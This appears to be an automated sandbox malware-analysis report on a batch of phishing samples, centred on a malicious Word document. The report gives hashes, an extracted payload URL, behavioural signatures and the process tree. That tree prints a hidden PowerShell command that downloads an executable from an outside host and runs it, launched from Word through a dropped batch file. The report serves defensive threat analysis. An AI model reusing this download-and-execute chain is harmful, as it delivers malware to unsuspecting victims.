Overview
overview
10Static
static
827-07-2021...de.pdf
windows7_x64
127-07-2021...de.pdf
windows10_x64
127-07-2021...58.doc
windows7_x64
1027-07-2021...58.doc
windows10_x64
1027-07-2021...58.exe
windows7_x64
1027-07-2021...58.exe
windows10_x64
1027-07-2021...1.docx
windows7_x64
427-07-2021...1.docx
windows10_x64
127-07-2021...1.docx
windows7_x64
427-07-2021...1.docx
windows10_x64
127-07-2021...80.exe
windows7_x64
1027-07-2021...80.exe
windows10_x64
1027-07-2021...PO.exe
windows7_x64
1027-07-2021...PO.exe
windows10_x64
1027-07-2021...ST.exe
windows7_x64
1027-07-2021...ST.exe
windows10_x64
1027-07-2021...ON.exe
windows7_x64
1027-07-2021...ON.exe
windows10_x64
1027-07-2021...21.pdf
windows7_x64
127-07-2021...21.pdf
windows10_x64
127-07-2021...PY.exe
windows7_x64
1027-07-2021...PY.exe
windows10_x64
1027-07-2021...AT.exe
windows7_x64
1027-07-2021...AT.exe
windows10_x64
1027-07-2021...ry.exe
windows7_x64
27-07-2021...ry.exe
windows10_x64
10Analysis
-
max time kernel
109s -
max time network
144s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
27-07-2021 09:08
Static task
static1
Behavioral task
behavioral1
Sample
27-07-2021/27-07-2021/Dike-Infocert-Upgrade.pdf
Resource
win7v20210408
Behavioral task
behavioral2
Sample
27-07-2021/27-07-2021/Dike-Infocert-Upgrade.pdf
Resource
win10v20210410
Behavioral task
behavioral3
Sample
27-07-2021/27-07-2021/ETL_013265_601_0758.doc
Resource
win7v20210408
Behavioral task
behavioral4
Sample
27-07-2021/27-07-2021/ETL_013265_601_0758.doc
Resource
win10v20210410
Behavioral task
behavioral5
Sample
27-07-2021/27-07-2021/ETL_013265_601_0758.exe
Resource
win7v20210408
Behavioral task
behavioral6
Sample
27-07-2021/27-07-2021/ETL_013265_601_0758.exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
27-07-2021/27-07-2021/FL_6110_32_75_21.docx
Resource
win7v20210410
Behavioral task
behavioral8
Sample
27-07-2021/27-07-2021/FL_6110_32_75_21.docx
Resource
win10v20210408
Behavioral task
behavioral9
Sample
27-07-2021/27-07-2021/IMG_1026001780541.docx
Resource
win7v20210410
Behavioral task
behavioral10
Sample
27-07-2021/27-07-2021/IMG_1026001780541.docx
Resource
win10v20210408
Behavioral task
behavioral11
Sample
27-07-2021/27-07-2021/Inv_7623980.exe
Resource
win7v20210410
Behavioral task
behavioral12
Sample
27-07-2021/27-07-2021/Inv_7623980.exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
27-07-2021/27-07-2021/New PO.exe
Resource
win7v20210410
Behavioral task
behavioral14
Sample
27-07-2021/27-07-2021/New PO.exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
27-07-2021/27-07-2021/ORDER LIST.exe
Resource
win7v20210408
Behavioral task
behavioral16
Sample
27-07-2021/27-07-2021/ORDER LIST.exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
27-07-2021/27-07-2021/REQUEST FOR QUOTATION.exe
Resource
win7v20210408
Behavioral task
behavioral18
Sample
27-07-2021/27-07-2021/REQUEST FOR QUOTATION.exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
27-07-2021/27-07-2021/Remittance Copy 22-07-21.pdf
Resource
win7v20210408
Behavioral task
behavioral20
Sample
27-07-2021/27-07-2021/Remittance Copy 22-07-21.pdf
Resource
win10v20210410
Behavioral task
behavioral21
Sample
27-07-2021/27-07-2021/SWIFT COPY.exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
27-07-2021/27-07-2021/SWIFT COPY.exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
27-07-2021/27-07-2021/WE09858577444.BAT.exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
27-07-2021/27-07-2021/WE09858577444.BAT.exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
27-07-2021/27-07-2021/inquiry.exe
Resource
win7v20210410
General
-
Target
27-07-2021/27-07-2021/ETL_013265_601_0758.doc
-
Size
114KB
-
MD5
a35d5eec842a0785f5b461da949b00cb
-
SHA1
fec56ecc489b226da672ecd31428a568b3e9dd2b
-
SHA256
1f2a609fdb89b7fda367578568a00f9739105c8a01202fd7c8784515be4bdd35
-
SHA512
fe60851ff0f43f0f55aac199dbe53a4de8a28e34732a4d83cca2d9f9820141f5dfbbfd7e5973e4c4226a16e1f4962395c9a97015dabe86a817f6970c2777ff82
Malware Config
Extracted
http://lifestyledrinks.hu/wp-includes/cs3/ETL_013265_601_0758.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2252 4056 cmd.exe WINWORD.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4056 WINWORD.EXE 4056 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2732 powershell.exe 2732 powershell.exe 2732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2732 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4056 WINWORD.EXE 4056 WINWORD.EXE 4056 WINWORD.EXE 4056 WINWORD.EXE 4056 WINWORD.EXE 4056 WINWORD.EXE 4056 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 4056 wrote to memory of 2252 4056 WINWORD.EXE cmd.exe PID 4056 wrote to memory of 2252 4056 WINWORD.EXE cmd.exe PID 2252 wrote to memory of 2732 2252 cmd.exe powershell.exe PID 2252 wrote to memory of 2732 2252 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27-07-2021\27-07-2021\ETL_013265_601_0758.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\buildingsociety.bat" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h Start-BitsTransfer -Source http://lifestyledrinks.hu/wp-includes/cs3/ETL_013265_601_0758.exe -Destination C:\Users\Public\Documents\factfriend.exe;C:\Users\Public\Documents\factfriend.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\buildingsociety.batMD5
8ce32d29b2af7ed32efc563dee9903cf
SHA118d67217f1e8a07a311175a274a753a0af4b9f7b
SHA25610f02361c25228a08242b6ddfd33e8b48ed0a647fe9d699ae5a8f55cd1a86573
SHA512dfc9080e48c115d85a263db1375cbed73405e27e402e995f2b6dc88028d62e344870325bd139c2d8fb9861a3a856e7133fb48724caaa81d000ea528b9e7a47cc
-
memory/2252-230-0x0000000000000000-mapping.dmp
-
memory/2732-352-0x000001B16E710000-0x000001B16E711000-memory.dmpFilesize
4KB
-
memory/2732-412-0x000001B16E2A8000-0x000001B16E2A9000-memory.dmpFilesize
4KB
-
memory/2732-403-0x000001B16E2A6000-0x000001B16E2A8000-memory.dmpFilesize
8KB
-
memory/2732-391-0x000001B16E760000-0x000001B16E761000-memory.dmpFilesize
4KB
-
memory/2732-291-0x000001B16E2A3000-0x000001B16E2A5000-memory.dmpFilesize
8KB
-
memory/2732-289-0x000001B16E2A0000-0x000001B16E2A2000-memory.dmpFilesize
8KB
-
memory/2732-271-0x000001B16E9A0000-0x000001B16E9A1000-memory.dmpFilesize
4KB
-
memory/2732-264-0x000001B16E230000-0x000001B16E231000-memory.dmpFilesize
4KB
-
memory/2732-255-0x0000000000000000-mapping.dmp
-
memory/4056-115-0x00007FF8256F0000-0x00007FF825700000-memory.dmpFilesize
64KB
-
memory/4056-116-0x00007FF8256F0000-0x00007FF825700000-memory.dmpFilesize
64KB
-
memory/4056-123-0x00007FF83F4C0000-0x00007FF8413B5000-memory.dmpFilesize
31.0MB
-
memory/4056-122-0x00007FF8413C0000-0x00007FF8424AE000-memory.dmpFilesize
16.9MB
-
memory/4056-114-0x00007FF8256F0000-0x00007FF825700000-memory.dmpFilesize
64KB
-
memory/4056-118-0x00007FF846470000-0x00007FF848F93000-memory.dmpFilesize
43.1MB
-
memory/4056-119-0x00007FF8256F0000-0x00007FF825700000-memory.dmpFilesize
64KB
-
memory/4056-117-0x00007FF8256F0000-0x00007FF825700000-memory.dmpFilesize
64KB
-
memory/4056-463-0x00007FF8256F0000-0x00007FF825700000-memory.dmpFilesize
64KB
-
memory/4056-464-0x00007FF8256F0000-0x00007FF825700000-memory.dmpFilesize
64KB
-
memory/4056-465-0x00007FF8256F0000-0x00007FF825700000-memory.dmpFilesize
64KB
-
memory/4056-466-0x00007FF8256F0000-0x00007FF825700000-memory.dmpFilesize
64KB